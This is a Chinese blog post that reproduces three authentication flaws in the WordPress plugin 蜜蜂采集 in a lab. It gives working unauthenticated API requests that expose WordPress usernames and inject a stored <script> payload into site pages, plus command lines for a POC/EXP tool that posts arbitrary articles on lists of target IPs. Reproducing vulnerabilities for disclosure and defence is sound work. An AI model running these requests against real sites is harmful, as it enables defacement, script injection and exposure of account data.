WordPress插件蜜蜂采集最新(2022-2-16)漏洞(XSS, WordPress用户名暴露,任意文章发布)复现

本次漏洞是WordPress的一款文章采集插件:蜜蜂采集,未对实现插件功能的相关API做鉴权;导致任何人发送的请求都会被执行。

下载漏洞复现环境:https://pan.baidu.com/s/1Oh_FX12UGpqrH0_ydoBNUA 提取码: wwi7

部分POC和EXP:https://github.com/NonAbsolute/MiFengBaiBaoXiangPluginPOCAndEXP

下载环境后解压“WordPress插件蜜蜂采集复现环境.zip”
依据README.md搭建环境,不再复述

漏洞一

WordPress用户名暴露
在该插件的采集页面如下图:
未对获取采集页面信息的API做限制,导致攻击者获得WordPress用户名等信息
在这里插入图片描述
在这里插入图片描述
我们打开检查元素并刷新页面看看POST请求
在这里插入图片描述
然后复制请求URL与请求内容到测试工具
在这里插入图片描述
在这里插入图片描述

URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/crawler
Content-Type: application/json
{"action":"get_config","target":"crawler"}

可以看到,不需要鉴权就获得了信息
在这里插入图片描述

漏洞二

XSS攻击
在该插件的“自定义代码”添加页,同样未鉴权;可轻易查询、添加自定义代码。
在这里插入图片描述
在这里插入图片描述
我们来利用测试工具发送请求看看

#查看自定义代码
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{"action":"fetch"}

获得了自定义代码的内容(因为没有添加自定义代码,所以为空)
在这里插入图片描述

#添加自定义代码
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{
    "action": "save",
    "data": [
        {
            "title": "testCode",
            "content": "<script>alert(\"我是邓文怡,我在广东深圳!\")</script>\n<h1>我是邓文怡,我在广东深圳!</h1>",
            "status": "on",
            "position": "head"
        }
    ]
}

可以看到,成功添加了自定义代码,并页面也有了反应
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
注明:“我很喜欢这句话;我想把它写在文中;不要见怪;无伤大雅。”

漏洞三

任意文章发布
这个复现就要靠上文中的“部分POC和EXP”的下载链接了。
具体实现过程可以看看Golang代码,和Github仓库中的README.md

我们这里仅下载作者编译好的可执行文件;简单使用一下。
下载可执行文件:
在这里插入图片描述

创建一个文件夹,将可执行文件放进去;因为它会在执行目录产生日志
在这里插入图片描述
-h查看使用方式
在这里插入图片描述
这里我简单说明一下:

--IP 你Kali的IP
--Port 你Kali的端口,任意;只要不被占用即可
--Type 值为'POC'或者'EXP',默认POC

--PayloadForTitle与--PayloadForMain 
二者填一个就行,都填也可;这是--Type为EXP情况下需填的Payload。PayloadForTitle为发布文章的标题;PayloadForMain为发布文章的内容。--Type为POC的情况下可不填此项。Payload支持文件路径。

--PageType 文章发布类型,是WordPress的文章还是页面;默认'Article'文章;也可填页面'Page'。

--ET 渗透目标,如果不填,则为交互模式;填则为自动化模式;仅支持文件路径。文件内目标以','分隔;如:
192.168.0.1,192.168.0.2,192.168.0.3

我们使用交互模式测试一下漏洞是否存在:

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 

在这里插入图片描述
进入交互模式,根据提示输入-h帮助
这里我再简单说明一下:

 --ET 渗透目标,目标以','分隔;如:
192.168.0.1,192.168.0.2,192.168.0.3

Close 退出交互模式

发现漏洞存在,如下图:

-ET 192.168.8.6:8080

在这里插入图片描述
我们结束POC,添加EXP参数进入EXP测试一下:

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 -Type EXP -PayloadForTitle 我是邓文怡,我在广东深圳 --PayloadForMain 我是邓文怡,我在广东深圳

在这里插入图片描述
发现渗透已经成功:
在这里插入图片描述
查看WordPress也确实添加了一篇文章:
在这里插入图片描述
在这里插入图片描述
退出EXP,我们看到当前目录产生了很多日志文件,里面记录了渗透情况:
在这里插入图片描述

漏洞修复建议

暂时禁用该插件,可避免被此漏洞影响。
在这里插入图片描述

注意⚠️,本次测试在安全环境下进行;所有代码仅限在复现环境中运行,请勿恶意篡改代码将代码运行在测试环境以外的地方;否则后果自负!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deng_Xian_Shemg

捐助1元钱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值